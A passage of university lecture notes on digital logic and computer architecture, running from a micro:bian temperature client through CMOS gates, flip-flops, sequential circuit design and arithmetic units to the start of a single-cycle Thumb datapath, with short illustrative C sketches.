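    set_state(psrc, RECEIVING, REPLY, psrc->message);
else
    make_ready(psrc);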

One rule restricts the use of sendrec(), but not in a way that affects its usage in practice: the sendrec() system call cannot be used to send a REPLY message. Allowing this could lead to a situation where a chain of processes are waiting, each wanting to use sendrec() to send a reply to the process to its right, but blocked from doing so because that process is itself waiting to send. When the process at the far right end of the chain eventually accepts a message, the whole chain would have to unravel at once, and that would complicate the implementation without making micro:bian any more useful.

A client program

Using the timer service, it's quite easy to write a client program that requests readings from the server at (say) 1 second intervals and prints them. Without floating point arithmetic, we have to be a bit sneaky about how we print the readings: since a reading is in units of 1/4°C, temp>>2 gives the whole degrees, and temp&0x3 selects the fractional part from a table of strings.

static const char *decimal[] = {
    "00", "25", "50", "75"
};

void main_task(int n)
{
    int t = 0, temp;

    while (1) {
        temp = temp_reading();
        /* Assume temp >= 0 */
        printf("%d: Temp = %d.%sC\n", t++, temp>>2, decimal[temp&0x3]);
        timer_delay(1000);
    }
}

The init() function must start the device driver and the main process, as well as the drivers for the timer and the serial port.

void init(void)
{
    serial_init();
    timer_init();
    TEMP_TASK = start("Temp", temp_task, 0, 256);
    start("Main", main_task, 0, STACK);
}

Lecture 17 – Introduction

Plan for the term. Combinational logic.

Our aim this term will be to show one way in which it is possible to build from transistors a computer capable of executing the kind of machine-language programs we wrote last term. It's important to realise that we will study only one way of doing each task, and that way will often not be the best.

  • We will use transistors to build logic gates.
    • We will stick to a design principle called CMOS, where each gate has two complementary networks of transistors, one to drive the output high when necessary, and the other to drive it low the rest of the time. We ignore clever implementations of some logic gates that use fewer transistors but do not follow this pattern.
  • We will use logic gates and latches (also built from transistors) to design functional units, including decoders, multiplexers, registers, and adders.
    • We will observe that a small selection of gate types is sufficient to implement any Boolean function, but we won't concern ourselves with methods for designing the smallest circuit that implements a specified function.
    • Likewise, after observing that logic-plus-latches is sufficient to implement any finite state machine, we won't be concerned with the routines and rituals needed to design optimal implementations of specified machines, but will be content to live on our wits a bit in designing the circuit elements we need.
    • Though we will show that each functional unit can be built from gates and latches, we'll largely ignore other implementations that are smaller and faster. For example, there is an implementation of ROMs that uses only one diode (or one transistor) per bit, and we mention it only in passing.
  • We will use functional units to design a simple 'single-cycle' implementation of a Thumb subset.
    • Because each instruction is executed in a single clock cycle, we won't attempt to implement those instructions, such as multi-register push and pop, that clearly require more than one cycle of activity.
    • And because the whole of the execution of an instruction happens within a clock cycle, the implication will be that a clock cycle for our design will be rather long, so the clock frequency will have to be low. More practical designs would overlap the execution of one instruction with fetching and decoding the next one, in a scheme called pipelining. We will not have time to go into that.

Logic gates

A combinational circuit has inputs and outputs that are Boolean values, drawn from {0, 1} = {false, true}; the outputs depend only on the current values of the inputs. (Contrast this with sequential circuits, where the outputs also depend on inputs in the past, and clairvoyant circuits, where the outputs depend on inputs that will arrive in the future.) In electronic logic, we represent 0 with a voltage close to ground, and 1 with a voltage close to the positive supply rail.

A logic gate is a combinational element that computes a single (simple) function of its inputs.

Gate symbols

For example, an AND gate has z = a ∧ b: the behaviour can be spelled out with a truth table, giving the output for each possible combination of inputs.

AND
a b z
0 0 0
0 1 0
1 0 0
1 1 1

As we'll see later, logic gates like this are simple enough that we can implement them with a handful of transistors. We can connect gates together to compute more elaborate functions. For example, consider this assembly of AND gates:

A tree of AND gates

We can deduce the behaviour of this circuit by drawing up a truth table, listing the 16 possibilities for the four inputs, and for each of them showing the intermediate signals x and y and the output z.

a b c d x y z
0 0 0 0 0 0 0
0 0 0 1 0 0 0
0 0 1 0 0 0 0
0 0 1 1 0 1 0
0 1 0 0 0 0 0
0 1 0 1 0 0 0
0 1 1 0 0 0 0
0 1 1 1 0 1 0
1 0 0 0 0 0 0
1 0 0 1 0 0 0
1 0 1 0 0 0 0
1 0 1 1 0 1 0
1 1 0 0 1 0 0
1 1 0 1 1 0 0
1 1 1 0 1 0 0
1 1 1 1 1 1 1

It's only if all four inputs are 1 that the output is 1: we have made a 4-input AND gate from three 2-input gates. The behaviour of any acyclic assembly of gates can be deduced in a similar way.
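Such tables are mechanical enough that we can generate them with a scrap of C – a throwaway sketch, mirroring the tree of AND gates above:

#include <stdio.h>

int main(void)
{
    printf("a b c d x y z\n");
    for (int i = 0; i < 16; i++) {
        int a = (i >> 3) & 1, b = (i >> 2) & 1;
        int c = (i >> 1) & 1, d = i & 1;
        int x = a && b, y = c && d;   /* the two first-level gates */
        int z = x && y;               /* the final gate */
        printf("%d %d %d %d %d %d %d\n", a, b, c, d, x, y, z);
    }
    return 0;
}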

Propagation delay

What about this circuit?

A cascade of AND gates

We can check – by reasoning or another truth table – that it also functions as a 4-input AND gate. But it performs less well. After the inputs of a gate become stable, it takes some time before the output also takes on a stable value. These delays add up along paths through the circuit, and it is the longest path that matters in determining the overall delay. So we prefer circuits with a small depth, so that all the paths are short.

Other gates

AND gates on their own can't do much, but there are other types we can use. Also shown in the picture above is an OR gate, z = a ∨ b, with this truth table:

OR
a b z
0 0 0
0 1 1
1 0 1
1 1 1

An inverter (NOT gate) outputs the opposite of its single input, z = ¬a, with the truth table:

NOT
a z
0 1
1 0

We can connect such gates together in any acyclic arrangement we choose, and each such circuit computes a Boolean function that we can also express as an algebraic formula in terms of the inputs. For example, this circuit computes the function

z = ¬((a ∧ b) ∨ c).
An AND-OR-NOT circuit

As a truth table,

a b c d e z
0 0 0 0 0 1
0 0 1 0 1 0
0 1 0 0 0 1
0 1 1 0 1 0
1 0 0 0 0 1
1 0 1 0 1 0
1 1 0 1 1 0
1 1 1 1 1 0

Adequacy

It turns out that AND, OR and NOT are sufficient to implement any Boolean function. I will demonstrate this with an example, and provide a separate note with a general proof – perhaps better digested after you have made some progress in Formal Proof. So let's take f(a, b, c) to be this 'majority' function (which we will find a use for later in the course):

MAJ
a b c f
0 0 0 0
0 0 1 0
0 1 0 0
0 1 1 1
1 0 0 0
1 0 1 1
1 1 0 1
1 1 1 1

There are four lines in the truth table where the function takes value 1, and we can write a 'product term' for each of these lines that is true on that line and false everywhere else.

  • p = ¬a ∧ b ∧ c
  • q = a ∧ ¬b ∧ c
  • r = a ∧ b ∧ ¬c
  • s = a ∧ b ∧ c.
a b c p q r s f
0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0
0 1 0 0 0 0 0 0
0 1 1 1 0 0 0 1
1 0 0 0 0 0 0 0
1 0 1 0 1 0 0 1
1 1 0 0 0 1 0 1
1 1 1 0 0 0 1 1


We can get a formula for f by taking the disjunction (sum) of these four terms.

f = (¬a ∧ b ∧ c) ∨ (a ∧ ¬b ∧ c) ∨ (a ∧ b ∧ ¬c) ∨ (a ∧ b ∧ c).

That formula agrees with f on every line of the truth table: on lines where f is 1, exactly one of the terms is true – namely the term that was written for that line, so when we OR all the terms together, we get 1. On lines in f's truth table where f is false, all of the terms are false, so ORing them together also gives false.

It should be evident that we could go through a similar procedure for any desired function f, writing a Boolean formula that agrees with f for all inputs. Given such a formula, we can draw a circuit containing AND, OR and NOT gates in a routine way, such as this circuit for the majority function, using four 3-input AND gates and a 4-input OR gate:

Majority circuit 1

This procedure gives a circuit that implements any desired Boolean function, but often there is a simpler, equivalent formula, leading to a simpler circuit. In the case of the majority function, we find

f = (a ∧ b) ∨ (a ∧ c) ∨ (b ∧ c).

To verify that this formula is also correct, we can make a truth table for it, observing that each of the three terms is true only if f is true also, and that together they cover all the situations in which f is true. Alternatively, we can simplify the original expression algebraically to get the same result.

f = (¬a ∧ b ∧ c) ∨ (a ∧ b ∧ c)
  ∨ (a ∧ ¬b ∧ c) ∨ (a ∧ b ∧ c)
  ∨ (a ∧ b ∧ ¬c) ∨ (a ∧ b ∧ c)
 = ((¬a ∨ a) ∧ b ∧ c)
  ∨ (a ∧ (¬b ∨ b) ∧ c)
  ∨ (a ∧ b ∧ (¬c ∨ c))
 = (b ∧ c) ∨ (a ∧ c) ∨ (a ∧ b)
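A third route is to let the machine do the checking. Here's a throwaway C sketch that compares the two formulas on all eight inputs:

#include <assert.h>

int main(void)
{
    for (int i = 0; i < 8; i++) {
        int a = (i >> 2) & 1, b = (i >> 1) & 1, c = i & 1;
        int f1 = (!a && b && c) || (a && !b && c)
                 || (a && b && !c) || (a && b && c);
        int f2 = (a && b) || (a && c) || (b && c);
        assert(f1 == f2);   /* the two formulas agree everywhere */
    }
    return 0;
}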

There are routine, manual procedures that take a Boolean function with a small number of variables and find its minimal expression as a 'sum of products', but we don't have time to study them in this course. Such procedures are hard to use if there are more than 4 inputs to the circuit, and are in any case rendered irrelevant by computer methods that you can study in the course Computer-Aided Formal Verification. Comforting though rituals are, in this course it will be enough for us to rely on insight, enthusiasm and good luck.

Added in the lecture

1. Multiplexer: a combinational circuit implementing z = (¬c ? a : b) by

z = (¬c ∧ a) ∨ (c ∧ b)

2. Input combinations as vertices of a (hyper)cube with terms as edges or faces. Finding a covering set of prime implicants for the majority example using the cube, and using a Karnaugh map. (Not examinable.)

Lecture 18 – Transistors and logic gates

Building gates from transistors. CMOS logic.

As a growing competitor to the tube amplifier comes now the Bell Laboratories’ transistor, a three-electrode germanium crystal of amazing amplification power, of wheat-grain size and low cost. Yet its frequency limitations, a few hundred kilocycles, and its strict power limitations will never permit its general replacement of the [vacuum tube] amplifier. – Lee de Forest, inventor of the thermionic valve, 1952

Transistors and logic gates

There are various circuit symbols for an n-type MOSFET – or in full, an n-channel enhancement-mode metal-oxide-silicon field-effect transistor.

N-type transistors

We will generally use the simplest symbol, the one at the left. As the symbol suggests, the transistor consists of a piece of silicon (the channel) with terminals (the source and the drain) at the two ends, and a separate connection to the gate, which is electrically isolated from the channel. Connecting the gate to a positive voltage with respect to the channel allows electrons to enter the channel at the source and to leave at the drain, so that a current flows in the transistor.

A simple model for the behaviour of such a transistor is that if the gate is connected to the positive power supply terminal (Vdd, typically +3.3V), the source and drain are connected together, but if it is connected to ground (0V), then they are not connected. We'll avoid situations where the gate is not connected to one of these two voltages.

We will also use another kind of transistor, the p-type.

P-type transistors

The symbol with the little circle is not greatly liked by electronic engineers, but it's the one we shall use. The behavioural model we will adopt for the p-type is that if its gate is connected to ground, then the transistor conducts, and if it is connected to Vdd then it does not conduct.

We will (nearly) always design circuits in a style called CMOS (for complementary MOS) that contain equal numbers of n-type and p-type transistors. The simplest useful circuit is an inverter.

Inverter

This circuit has one input at a and one output at z. If a is connected to ground, then the n-type transistor does not conduct, but the p-type does: this connects the output z to Vdd. On the other hand, if a is connected to Vdd, then it is the n-type transistor that conducts, connecting z to ground. We can make a truth table that summarises the behaviour of the circuit.

a z
0 1
1 0

It's worth noticing that in a steady state, only one of the transistors is conducting, so no quiescent current is drawn from the supply. Also, the gates of the transistors are electrically insulated from the supply, so no current is drawn from the input a in a steady state. Current does flow during transitions, because there is some capacitance between the gate and channel that must be charged or discharged when the gate voltage changes, and for a brief period both transistors will be partially turned on, allowing current to flow through them. Facts like this lead to the observation that the power dissipation of a CMOS logic circuit is proportional to the rate of state transitions.

Another important observation is that if the input a is not actually at the rails, but close to them, then that will be enough to fully turn off one transistor and fully turn on the other, and the output will be very close to the opposite rail. Despite the fact that a negligible current is drawn at the input, substantial current is available at the output. It is this amplifying behaviour of logic gates that lets us build large, complex assemblies of gates with many stages and have the whole thing behave in a digital way.

We can't do much with just an inverter! So let's next look at this design for a NAND gate.

NAND gate

In this circuit (as you see) there are two n-type transistors in series connecting the output z to ground, and two p-types in parallel connecting it to Vdd. Each input of the circuit, a or b, is connected to one of the n-types and one of the p-types. We can analyse the behaviour of this circuit case by case, but the upshot is that if one or both of the inputs are grounded, then one or both of the p-types will conduct, driving the output high; and in these cases the two n-types are never both conducting, so there is no path from the output to ground. On the other hand, if both inputs are high, the two n-types both conduct, driving the output low, but the p-types do not conduct and the output is disconnected from Vdd. We call the function NAND, because the output is low only if both a and b are high. Here's the truth table:

a b z
0 0 1
0 1 1
1 0 1
1 1 0

The NAND gate seems a curious choice for our first useful gate, but it is actually a natural one, because it is simple, and because it shares with all simple CMOS gates the property of being anti-monotonic: as inputs change from 0 to 1, that can only make more of the n-type transistors in the bottom half of the gate conduct, and fewer of the p-types in the top half; and that can only cause the output, if it changes at all, to change from 1 to 0.

To get an AND gate, where the output is 1 exactly if both inputs are 1, we can follow the NAND gate with an inverter.

AND gate

CMOS gates in general

In general, a single CMOS gate has a network of n-type transistors connected between the output and ground, and a network of p-type transistors connected between the output and Vdd. Wherever n-type transistors are connected in parallel, the corresponding p-type transistors are connected in series, and vice versa. For example, here is a design for an AND-OR-NOT gate:

AND-OR-NOT gate

In this circuit, the output z is connected to ground if either both a and b are high, or c is high (regardless of a and b). And z is connected to Vdd if either a or b is low, and c is also low. In short,

z = ¬((a ∧ b) ∨ c) = (¬a ∨ ¬b) ∧ ¬c.

As a truth table,

a b c z
0 0 0 1
0 0 1 0
0 1 0 1
0 1 1 0
1 0 0 1
1 0 1 0
1 1 0 0
1 1 1 0

Complex gates like this are sometimes an efficient way of computing a Boolean function, but just NAND gates are enough to compute any function we might need. We can take any circuit in sum-of-products form (like either form of the majority function) and replace both the inner conjunctions and the outer disjunction with NAND gates. So for the more compact formula

f = (a ∧ b) ∨ (a ∧ c) ∨ (b ∧ c)

we obtain

f = NAND(NAND(a, b), NAND(a, c), NAND(b, c)).

This works essentially because of De Morgan's law, ¬(x ∧ y) = ¬x ∨ ¬y. Here is the corresponding circuit, consisting of just NAND gates:

Majority circuit 2

Questions

In the lectures, you used only p-type transistors in the upper part of a CMOS gate and the corresponding n-type transistors in the lower part. Can we mix them up in order to make a circuit that implements (a ∨ ¬b) ?

No, the rule for simple gates is that there is a pull-down network consisting of only n-type transistors, and a complementary pull-up network consisting of only p-types, with the gate of each transistor connected to an input of the gate. Consequently, the gate's function is anti-monotonic, and a ∨ ¬b cannot be implemented by a single gate. The best we can do is NAND(¬a, b), which requires a NAND gate and an inverter. In a complex circuit, it's highly likely that ¬a would already be available, so the function would actually require only a single gate to be added.

It's reasonable to ask what would be a 'non-simple' gate, and there the added elements are pass-transistors, pairs of transistors containing an n-type and a p-type that either pass or block a signal. They don't help with implementing a ∨ ¬b, but if there's time I will mention them. There's a nice non-restoring implementation of XOR that uses two pairs of pass transistors and has a lower transistor count than the other implementations we've seen.

Lecture 19 – Sequential logic

Flip-flops. Designing sequential circuits.

Sequential circuits

In contrast to combinational circuits, sequential circuits have outputs that depend on the inputs from previous times in the history of the circuit. To construct such circuits, we must introduce a new element with 'memory': a (positive edge-triggered) D-type flip-flop.

D-type flip-flop

The flip-flop has two inputs, d and clk, and one or two outputs, one called q, and perhaps (for convenience) another equal to ¬q.

We will concentrate on fully synchronous designs where all the clock inputs of flip-flops are connected to a single, regular, global clock signal – perhaps derived from a quartz crystal. The little triangle in the circuit symbol means that the state of the flip-flop can change only when the clock signal makes a transition from 0 to 1 – a positive-going clock edge.

Because signals can now change over time, each wire will now carry a sequence of Boolean values ⟨a0, a1, a2, ...⟩. Combinational gates compute the same function in each clock period: for an AND gate, zt = at ∧ bt.

The D-type always produces as its output the value that its input had during the previous clock period

zt+1 = at.

We could spell out this behaviour in a kind of truth table, though it is a bit boring.

a zt zt+1
0 0 0
0 1 0
1 0 1
1 1 1

As you can see, the next state is always the same as the input, whatever the current state might be. (Other kinds of flip-flop exist where the next state depends on the current state as well as the input – they used to be popular with SSI logic, because they sometimes lead to simpler designs.)

We will assume the initial condition z0 = 0. Most flip-flops have an 'asynchronous reset' input that can be used to ensure this.

If you search for datasheets of SSI chips, you can find equivalent circuits for flip-flops in terms of gates: but you shouldn't take them too seriously, because the dynamic behaviour of a flip-flop over time cannot be deduced from the static behaviour of a collection of logic gates.

Example: parity detector

Before we look at the problem of specifying and designing sequential circuits, we should work out the behaviour of a given circuit.

Parity detector

In this circuit, the signals satisfy

xt = at ⊕ zt
zt+1 = xt
z0 = 0

We can prove by induction on t that

zt = a0 ⊕ a1 ⊕ ... ⊕ at-1.

So the output is the parity of the input signals received so far.
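The defining equations translate directly into a little simulation – a sketch with an arbitrary input stream:

#include <stdio.h>

int main(void)
{
    int a[] = {1, 0, 1, 1, 0, 1};     /* arbitrary input stream */
    int z = 0;                        /* initial state z0 = 0 */

    for (int t = 0; t < 6; t++) {
        printf("t=%d  a=%d  z=%d\n", t, a[t], z);
        z = a[t] ^ z;                 /* z_{t+1} = a_t XOR z_t */
    }
    return 0;
}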

Example: pulse shaper

Let's design a circuit that shapes an input signal into neat pulses, each lasting one clock cycle.

Timing diagram for pulse shaper

Note that

  • long input pulses become short output pulses, synchronised to the clock.
  • short pulses are lengthened to the clock period.
  • output pulses can occur on alternate clock cycles.
  • very short input pulses are ignored if they do not straddle a clock edge.

This circuit can be used to clean up the signal from a mechanical switch so as to remove contact bounce.

Some thought reveals that we can produce the output signal if we know the value of the input at the previous two clock edges. So if we arrange that always xt = at−1 and yt = at−2, then the output is given by

z = x ∧ ¬y

We can arrange for x and y to be the signals we want by arranging two D-types, one with D = a and Q = x, and another with D = x and Q = y.

Pulse shaper

We can think of the pulse shaper as a machine for running the following program, where the pause represents a delay until the next clock edge, and the two assignments y = x; x = a; happen simultaneously and instantaneously.

x = y = 0;
forever {
    z = x && !y;
    pause;
    y = x; x = a;
}

We could emphasise the simultaneous nature of the updates by extending C a bit (more) and writing a simultaneous assignment x, y = a, x; – a form that (e.g.) Python allows.

Clock speed

How fast can we make the clock? It all depends on the critical path – that is, the longest combinational delay in the circuit.

Critical path

Delays accumulate along each combinational path. In the diagram, time t1 is the propagation delay of the first flip-flop; times t2 and t3 are the propagation delays of the two gates, and time t4 is the setup time of the second flip-flop. For the circuit to work correctly we must set the clock period T so that T ≥ t1 + t2 + t3 + t4, and the same for all combinational paths.
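For example, with illustrative figures (invented purely for the sake of the arithmetic) of t1 = 0.5 ns, t2 = t3 = 0.7 ns and t4 = 0.3 ns, this path requires T ≥ 2.2 ns, so the clock can run no faster than about 450 MHz – and a longer path elsewhere in the circuit would reduce that further.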

Another timing calculation, involving contamination delays, is needed to put a bound on the amount of clock skew the circuit can tolerate.

Example: Bathroom light switch

Let's design a digital implementation of the kind of pull-cord light switch that is often found in British bathrooms. The first time you pull the cord, the light comes on. It stays on when you release the cord, but goes off when the cord is pulled for a second time. The switch has one input and one output: the output changes state just once for each pulse on the input, however long. In our digital circuit, the light will switch on the next clock edge following the change in input.

Timing diagram for bathroom light switch

It's tempting to think that this circuit has just two states – on and off – but that's not so. The arrows on the timing diagram mark two clock edges where the light is on and the input a is 1, but in one case the light stays on, and in the other it goes off. (If you've used a switch like this, you know there are two clunks – two changes of state – for each pull of the cord.)

We could try drawing a diagram of states, but we can also see that the following program does the right thing.

x = y = 0;
forever {
    z = y;

    pause;

    if (a)
        y = !x;
    else
        x = y;
}

Initially, x and y are both zero. When you pull the cord, y becomes one, but x stays at zero, and this remains true however long the cord is held. When the cord is released, x is set to one also, without any change in the output. Pulling the cord for a second time does just the same thing, but with the roles of 0 and 1 swapped.

Let's rewrite the loop body so that the state change becomes a single simultaneous assignment of the form

x, y = f(x, y, a), g(x, y, a);

since that is all that makes sense if we want to implement the program using fully synchronous hardware. The meaning of this assignment is that both f(x, y, a) and g(x, y, a) are evaluated, and the values are simultaneously assigned to x and y respectively. For this we need the fact that assigning the existing value of x to itself is the same as not assigning at all.

forever {
    z = y;
    pause;
    x, y = (a ? x : y), (a ? !x : y);
}

The conditional expressions (a ? x : y), meaning "if a then x otherwise y", can be implemented in hardware with multiplexers. For simplicity, we show two separate 1-bit multiplexers, though they could share some common circuitry.

Bathroom light switch

Questions

What is the semantics of your C-like hardware description language?

Semantics? You are taking it too seriously: it's just intended as a prompt to think about the behaviour of a sequential circuit as embodying a program.

But to answer the question, the most general form for a program that does make sense as a sequential circuit (with input a, state bits x and y, and output z) is this:

x = y = 0;
forever {
    z = h(x, y);
    pause;
    x, y = f(x, y, a), g(x, y, a);
}

That contains an assignment that sets the output as a function of the values of the state variables, and following each clock edge a simultaneous assignment that sets new values for x and y based on their old values and the input. This denotes a Moore machine in which the next-state function is <f, g> where

<f, g>(x, y, a) = (f(x, y, a), g(x, y, a))

and the output function is h. The "forever/pause" loop (no nesting allowed) means "at each clock edge".

Other "programs" such as this:

x = y = 0;
forever {
    z = x;
    pause;
    if (a) x = !y; else y = x;
}

are to be re-construed in the simultaneous-assignment form shown above – in this case, by writing

x, y = (a ? !y : x), (a ? y : x);

so that if a is 1, then x gets set to !y and y is unchanged in each clock cycle, and if a is 0, then x is unchanged and y gets set to x. And we might design a shift register with y = x; x = a; meaning x, y = a, x. Anything that helps as a stepping stone towards the equivalent simultaneous assignment is encouraged.

If programs in this form help us to think of the behaviour as a program and reduce it to a simultaneous assignment, then they have served their purpose.

Aren't sequential circuits equivalent to finite-state automata?

Yes, they are: a sequential circuit containing n flip-flops has a set of states with 2^n elements (not all of them necessarily accessible), and the combinational logic that computes the next state from the current state and inputs amounts to the transition function of what the Models of Computation course calls a deterministic finite automaton (DFA). Conversely, given any DFA with at most 2^n states, we can number the states with binary numerals of n bits each, and the transition function of the automaton then becomes n Boolean functions for the next value of each bit, which we know can be implemented in combinational logic.

This gives a systematic but somewhat soul-destroying way of designing a sequential circuit to solve a problem: we first solve the problem with a DFA, then laboriously tabulate all the state transitions that the DFA can make, choose a binary numbering of its states, and design combinational logic to implement the next-state function. The size and regularity of the combinational logic will depend on the numbering of states that is chosen in a way that is imponderable unless we can exploit a lucky insight. This approach tends to minimise the number of bits of state that are used, sometimes at the expense of seeing the problem in a regular or symmetric way, so that it can happen that the smaller number of state bits comes at the expense of vastly more complicated and obscure combinational logic.

Our approach will be different: we will rarely have to design a sequential circuit for an arbitrary finite automaton, and we need not care about minimising the number of states if using a few more states makes the circuit easier to understand. Thus, we might design a pulse-shaping circuit by observing that the output depends in a simple way on the last three (say) bits of input, and design a circuit that saves them in three flip-flops configured as a shift register. It matters little that there is another solution that uses only two flip-flops to distinguish four different states but has combinational logic that must be designed by calculation rather than insight.

Lecture 21 – Architectural elements

Circuits for arithmetic. Multiplexers. Register files. Arithmetic-Logic Unit. Barrel shifter.

Circuits for arithmetic

The XOR gate is very useful for arithmetic circuits.

XOR gate with implementation
XOR
a b z
0 0 0
0 1 1
1 0 1
1 1 0

Though we could make it out of NAND gates (e.g., using the neat circuit shown above), there's a clever implementation using pass transistors that is more economical in space and time.

An XOR gate and an AND gate together make a 'half-adder' that adds two bits, giving a sum and a carry output.

Half adder
Half adder
a b c s
0 0 0 0
0 1 0 1
1 0 0 1
1 1 1 0

A 'full adder' accepts a carry input as well as producing a carry output. We can either make it from two half-adders and an OR gate, or we can design it from scratch, using a 3-input XOR gate for the sum and a majority gate for the carry.

Full adder

The classic 'ripple-carry' adder uses a chain of full adders to add two binary numbers.

Ripple-carry adder

The big problem with this circuit is the very long critical path caused by the carry chain. It's possible to do better than this, using more hardware (but still an amount proportional to n) to produce an n-bit sum in log n time.

A subtracter a - b can be made from an adder by complementing b bitwise and setting the carry-in to 1. For a circuit that can both add and subtract, use a row of XOR gates controlled, like the carry-in, by a signal set to 0 for add and 1 for subtract.
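As a behavioural sketch in C (one loop iteration per full adder – a model, not a claim about the real hardware), the adder-subtracter looks like this; the sub signal drives both the row of XOR gates and the carry-in:

/* addsub -- ripple-carry add/subtract, bit by bit */
unsigned addsub(unsigned a, unsigned b, int sub)
{
    unsigned z = 0;
    int c = sub;                             /* carry-in: 0 for add, 1 for subtract */

    for (int k = 0; k < 32; k++) {
        int ak = (a >> k) & 1;
        int bk = ((b >> k) & 1) ^ sub;       /* XOR gate complements b for subtract */
        int s = ak ^ bk ^ c;                 /* 3-input XOR gives the sum bit */
        c = (ak & bk) | (ak & c) | (bk & c); /* majority gives the carry */
        z |= (unsigned) s << k;
    }
    return z;
}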

Decoder and multiplexer

A two-way, one-bit multiplexer.

Two-way multiplexer

An 8-way decoder.

3-to-8 decoder

An n-way multiplexer

Multiplexer

(Replicate all but the decoder for a multi-bit multiplexer.)

A ROM with 8 single-bit locations

Read-only memory

An 8x8 ROM (bigger sizes are available)

Read-only memory 8x8

Programmable logic

Viewed at a higher level of abstraction, a sequential circuit consists of a number of state-bearing elements that we can model as a row of flip-flops, together with a Boolean function that derives the output and the next state from the input and current state.

Sequential circuit

Rather than implementing the combinational logic with some carefully-crafted arrangement of logic gates, we can consider replacing it with a lookup table implemented as a ROM. This has several advantages:

  • designing logic circuits is difficult to do by hand.
  • for larger designs, regularity – leading to easier chip layout – is more important than minimising the number of gates.
  • for prototyping and small scale production, chip count is more important than gate count. (That's why we would use a microcontroller where it gives sufficient performance.)
  • time to market, inventory size, and flexibility all militate for board designs that are independent of detailed function.

So programmable logic devices are the way to go.

We can formulate an adequacy argument for sequential circuits using the general scheme shown above. Taking any (deterministic) finite-state machine, we can label each state with a different string of bits, by numbering them in binary or otherwise, and also encode the inputs and outputs of the machine as bit-strings. Then the next-state function becomes a somewhat complicated function from bit-strings to bit-strings, which we know can be implemented in combinational logic.
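Putting the two ideas together, the next-state logic collapses to a single ROM lookup. Here's a sketch with invented widths:

#define STATE_BITS 4
#define INPUT_BITS 2

/* ROM holding the next state for every (state, input) pair */
static unsigned char next[1 << (STATE_BITS + INPUT_BITS)];

/* step -- one clock edge of the machine */
unsigned step(unsigned state, unsigned input)
{
    /* The ROM address is the state and input bits concatenated */
    return next[(state << INPUT_BITS) | input];
}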

Register

A multi-bit register with write enable.

n-bit register

A fully synchronous alternative.

Fully synchronous register

Register file

A basic, twin-port register file.

Register file

The ARM register file, with special features.

ARM register file

Arithmetic-logic unit

A simple ALU.

Arithmetic-logic unit

Barrel shifter

We can make a circuit that can shift left by any distance by taking the shift amount bit by bit, combining in sequence circuits that can shift by 16, 8, 4, 2, 1. Here's a picture of a three-stage shifter that can shift an 8-bit quantity left by any amount from 0 to 7:

Barrel shifter

(I'm not quite sure why this circuit is called a 'barrel' shifter, but I like to imagine the extreme sport where people try to balance on top of a floating barrel by taking large or small steps to left or right.)
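Behaviourally, the staged structure corresponds to this C sketch (for a 32-bit shifter), where each if models one rank of two-way multiplexers, controlled by one bit of the shift amount:

/* lsl -- barrel shifter for logical shift left */
unsigned lsl(unsigned x, unsigned n)
{
    for (int k = 16; k >= 1; k >>= 1) {
        if (n & k)
            x <<= k;      /* this stage shifts by k, or passes x through */
    }
    return x;
}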

That shifter was only able to implement logical-shift-left (lsl). For right shifts (lsr and asr) and rotations (ror), replace the two-way MUXes with five-way MUXes, feeding the three extra inputs of each MUX in stage k with the relevant bits of x LSR 2^k or x ASR 2^k or x ROR 2^k.

The ARM datapath's shifter also produces a Boolean signal that is the last bit shifted out; it's not hard to add that as an extra output, with each stage overriding the signal produced by previous stages.

Lecture 22 – Designing a datapath

The plan now is to put together the elements we have studied into a simple datapath that can execute Thumb instructions. We'll do it in stages, adding at each stage just sufficient logic to implement a few more instructions. The design we make will be seriously unrealistic, in that all the work of executing an instruction will be performed inside a single clock cycle: this will lead to longer combinational paths than we would like, and so require a lower clock speed. A more practical design would use pipelining to overlap the execution of each instruction with preparation for the next one. You can study pipelining and the design questions it raises in next year's course on Computer Architecture. For now, we must be content with the observation that if we wanted a pipelined implementation of the Thumb architecture, then effort spent on this single-cycle implementation would not be wasted, because a pipelined design starts with a single-cycle design, drawing lines across the circuit to separate what happens for a particular instruction in this clock cycle from what happens in the next.

The design is shown in these notes by means of a sequence of circuit diagrams, each accompanied by a selection of settings for the control signals that correspond to instructions that the circuit is capable of executing. The final design is also represented by a register-level simulator written in C. The simulator contains tables that decode all the instructions it implements, and is capable of loading and executing binary images prepared using the standard Thumb tools.

  • The handout for this lecture and the next one is provided as a separate, printable document. The content is the same, but the presentation has been edited for printing.
  • Source code for the simulator is available as part of the (utterly optional) Lab five.
  • An annotated listing of the simulator is also provided as a PDF document.

Stage 1: Instruction fetch

The first stage is to arrange to fetch a stream of instructions from memory, and decode them into control signals that will drive the rest of the datapath. For this, let's install a program counter PC, a register that will, on each clock cycle, feed the address of the current instruction to a memory unit IMem so that it fetches a 16-bit instruction. There's also a simplified adder that increments the PC value by 2 and feeds it back into the PC as the address of the next instruction. Some of the 16 bits of the instruction are fed into a combinational circuit that decodes it, producing a bundle of control signals that are fed to the functional units in the datapath. Since those functional units and their connections are yet to be added, we can't say precisely what the control signals are at this stage; but let's add wiring that makes both the control signals and the remaining bits of the instruction (those that have not been accounted for in the encoding) available to each part of the datapath. We can imagine building the decoder from a ROM or (as we'll see later) several ROMs that decode different parts of the instruction.

This design is capable of implementing only straight-line programs with no branching, because there is no way to avoid a sequence of PC values that goes 0, 2, 4, 6, ... Also, this design doesn't reflect the fact that instructions can access the PC alongside the other 15 registers. We'll adjust the design later to correct both these infelicities.

Stage 2: ALU operations

Now let's add some datapath components: a simple register file and an ALU. The twin-port register file is capable of reading the values of two registers and writing a result to a third register, all in the same clock cycle. We can imagine for now that the three registers are selected by fixed fields in the instruction, as they are in the add reg instruction:

Adds-rrr format.png

In executing this instruction, the two registers that are read are selected by fields instr<5:3> and instr<8:6> of the instruction. The control unit must ask the ALU to add its two inputs, producing a result that is fed back to the register file. The control unit also tells the register file to write the result back into the register selected by instr<2:0>.
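
In a simulator written in C, extracting these fields is a matter of shifting and masking; the FIELD macro below is a hypothetical helper, not a quotation from the course simulator.

    #include <stdint.h>

    /* Extract the field instr<hi:lo> as an unsigned value. */
    #define FIELD(instr, hi, lo)  (((instr) >> (lo)) & ((1u << ((hi)-(lo)+1)) - 1))

    void decode_regs(uint16_t instr) {
        unsigned cRegA = FIELD(instr, 5, 3);   /* first register read */
        unsigned cRegB = FIELD(instr, 8, 6);   /* second register read */
        unsigned cRegC = FIELD(instr, 2, 0);   /* register written with the result */
        /* for instr = 0x1888 (adds r0, r1, r2) these come out as 1, 2 and 0 */
    }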

The same datapath could be used to implement other instructions that perform arithmetic on registers: the three-register form of sub, certainly:

Subs-rrr format.png

